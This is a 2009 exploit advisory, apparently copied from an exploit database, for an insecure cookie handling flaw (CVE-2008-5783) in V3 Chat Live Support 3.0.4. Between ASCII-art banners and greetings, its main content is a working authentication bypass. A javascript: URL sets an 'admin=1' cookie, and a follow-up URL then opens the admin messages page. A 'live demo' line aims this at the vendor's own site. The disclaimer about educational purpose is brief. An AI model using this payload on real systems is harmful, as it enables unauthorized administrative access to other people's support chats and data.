 Topic: |
V3 Chat Live Support 3.0.4 Insecure Cookie Handling Vulnerability |
| Credit: |
Cyber-Zone |
| Date: |
2009.01.03 |
| CWE: |
CWE-287 (Show similar)
|
| CVE: |
CVE-2008-5783 (Show details)
Use CVE to see details like:
- CVSS2,
- Affected Software,
- References |
| Risk |
Local |
| Remote |
| High |
No |
| Yes |
************************************************************************************************************************
***********************************
[!]
[!]
[!] OOOO O OOOOOOOOO
[!]
[!] O O O O O
[!]
[!] O O O
[!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO
OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O
[!] OO Proud To Be MoroCCaN
[!]
[!] OO
[!]
************************************************************************************************************************
***********************************
+---- Bismi Allah Irahmani ArraHim
----+
++----------------------------------------------------------------------------------------------------------------------
----------------------------------+
++ [ V3 Chat Live Support v3.0.4 Insecure Cookie Handling Vulnerability ]
++
+-----------------------------------------------------------------------------------------------------------------------
---------------------------------++
: Author : Cyber-Zone ( Abdelkhalek) : :
:
¦ E-MaiL : Paradis_des_fous[at]hotmail[dot]fr
¦ ¦ ¦
¦ Home : WwW.IQ-Ty.CoM
¦ ¦ MySQL Version Is : ¦
¦ From : MoroCCo
¦ ¦ ¦
¦ Script : http://v3chat.com
¦ ¦ ![ ]! ¦
¦ Download : http://v3chat.com/live_support.php
¦ ¦ ¦
¦ RisK : High [¦¦¦¦¦¦¦¦]
¦ ¦
¦
¦ --------------------------------------------------------------------------------------------------------+
+-------------------------------------- ¦
¦ From The Dark Side Of MoroCCo
++
+-----------------------------------------------------------------------------------------------------------------------
---------------------------------++
:
:
¦ Remember :
¦
¦ -------------
¦
¦
¦
¦ This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.
¦
¦
¦
++----------------------------------------------------------------------------------------------------------------------
----------------------------------+
++ [!] Fi khater Ga3 Li TkarfasT 3liHom , Wali SabbiThom F IndeX Dyali , NabGhi NgoliHom : Rakom MaChafto WaLo ,
Wal9adimo Al3an [!] ++
+-----------------------------------------------------------------------------------------------------------------------
---------------------------------++
hato had code f URL :
javascript:document.cookie = "admin=1; path=/";
Live demo :
javascript:document.cookie = "admin=1; path=/v3livesupport-v304/admin/index.php; domain=v3chat.commain.php";
http://v3chat.com/v3livesupport-v304/admin/index.php
3awdo wtaw f enter f had Url :
http://v3chat.com/v3livesupport-v304/admin/messages.php
Please wait, logging you in... :)
+-----------------------------------------------------------------------------------------------------------------------
---------------------------------++
+---- ThanX To
----+
++----------------------------------------------------------------------------------------------------------------------
----------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major ,
$ WaLid , $ Oujda & Figuig City ]++
+-----------------------------------------------------------------------------------------------------------------------
---------------------------------++
= [AttaCk Is CompLet]
=
________________________________________________________________________________________________________________________
___________________________________
References:
http://www.securityfocus.com/bid/32216
http://www.milw0rm.com/exploits/7069
http://www.frsirt.com/english/advisories/2008/3066
http://secunia.com/advisories/32603
[ ASCII VERSION ]
|
